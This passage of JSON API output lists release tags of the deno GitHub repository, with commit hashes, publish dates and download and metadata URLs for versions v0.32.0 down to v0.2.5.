ags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":